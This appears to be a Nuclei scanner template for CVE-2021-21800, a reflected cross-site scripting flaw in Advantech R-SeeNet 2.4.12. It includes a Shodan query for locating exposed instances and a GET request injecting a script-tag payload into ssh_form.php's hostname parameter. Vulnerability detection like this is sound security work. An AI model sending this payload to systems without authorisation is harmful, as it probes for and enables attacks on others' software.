nuclei-templates/cves/2021/CVE-2021-21800.yaml

44 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-05 05:56:37 +00:00
id: CVE-2021-21800
info:
name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
2022-08-05 05:56:37 +00:00
author: arafatansari
severity: medium
description: |
Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.
2022-08-05 05:56:37 +00:00
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
2022-08-05 06:20:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21800
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-21800
cwe-id: CWE-79
2022-08-05 05:56:37 +00:00
metadata:
2022-08-05 06:20:39 +00:00
shodan-query: http.html:"R-SeeNet"
verified: "true"
2022-08-05 23:51:05 +00:00
tags: cve,cve2021,xss,r-seenet
2022-08-05 05:56:37 +00:00
requests:
- method: GET
path:
2022-08-05 06:20:39 +00:00
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"
2022-08-05 05:56:37 +00:00
matchers-condition: and
matchers:
- type: word
2022-08-05 06:20:39 +00:00
part: body
2022-08-05 23:51:05 +00:00
words:
- "<title>SSH Session </title><script>alert(document.domain)</script><title></title>"
2022-08-05 05:56:37 +00:00
- type: word
2022-08-05 23:51:05 +00:00
part: header
2022-08-05 05:56:37 +00:00
words:
2022-08-05 06:20:39 +00:00
- "text/html"
2022-08-05 05:56:37 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/09/02